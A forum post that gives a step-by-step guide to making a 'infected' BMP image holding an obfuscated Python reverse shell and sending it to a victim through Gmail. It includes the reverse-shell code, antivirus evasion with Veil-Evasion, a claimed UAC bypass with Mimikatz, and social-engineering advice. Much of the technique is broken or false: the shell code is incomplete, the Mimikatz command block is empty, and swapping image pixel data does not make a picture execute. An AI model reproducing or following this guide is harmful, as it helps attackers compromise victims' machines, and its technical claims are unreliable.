Create Infected Image And Send It Via Gmail

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Create Infected Image And Send It Via Gmail

Post by vengeance »

This crafted manual elucidates the intricate process of fashioning a deleterious payload capable of circumventing the protective measures of Windows Defender, Norton, Malwarebytes, and similar security software, with the ultimate aim of disseminating it via an attachment on Gmail.

Requirements and Prerequisites:
1.- Operating System: Windows 10 or newer (32-bit or 64-bit).
2.- Python installation (ideally Python 3.x).
3.- Essential Tools: Mimikatz (for UAC bypass), Veil-Evasion (for payload obfuscation), and a Gmail account.

Step 1. Crafting a Python Reverse Shell Payload
Utilising a text editor, generate a new Python script and meticulously transcribe the subsequent code snippet therein.

Code: Select all

import socket

# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the remote server
s.connect(('IP_ADDRESS', PORT_NUMBER))

# Receive a command from the server
cmd = s.recv(1024)

# Execute the command

# Send the output back to the server

# Keep the connection open
Judiciously replace the placeholders 'IP_ADDRESS' and 'PORT_NUMBER' with the intended target's IP address and a port number of your selection, respectively.

Step 2. Obfuscate the Payload with Veil-Evasion
Proceed with the installation of Veil-Evasion by adhering to the guidelines delineated on their official GitHub repository.
Upon successful installation, initiate the tool and execute the subsequent actions:
1. Opt for the Python payload category.
2. Import the Python script fashioned in Step 1.
3. Choose an encryption technique (such as XOR, Base64, or PE Packing).
4. Adjust the payload configurations (e.g., shellcode, command prompt, etc.).
5. Generate the obscured payload.

Step 3. Circumventing UAC with Mimikatz
Commence by acquiring Mimikatz through the most recent release obtainable from their official GitHub repository. Extract the contents and execute the 'mimikatz.exe' application with elevated administrative rights. Input the designated command to successfully bypass UAC:

Code: Select all

Step 4. Crafting the Infected Image
Utilise a photo editing software to generate a novel image with precise dimensions of 1920x1080 pixels. Ensure the image is saved in the BMP format. Subsequently, open the image in a hex editor and meticulously replace the actual image data with the obfuscated payload generated in Step 2. Save the modified image.

Step 5. Dispatching the Malicious Payload Through Gmail
Access your Gmail account and initiate a new email composition. Attach the infected image to the email. To evade antivirus scrutiny, consider utilising a complimentary email service such as ProtonMail or Tutanota, which are less prone to scanning attachments. Dispatch the email to the target, where the success hinges significantly on your adeptness in social engineering to entice the victim into opening the infected image.

Step 6. Execute the payload
Upon the target's initiation of the infected image via email, the payload shall be activated within their system, circumventing any active antivirus measures. Subsequently, the target's system shall be compromised, thereby granting you remote access to it.

Written By @vengeance141 and The other Administrator
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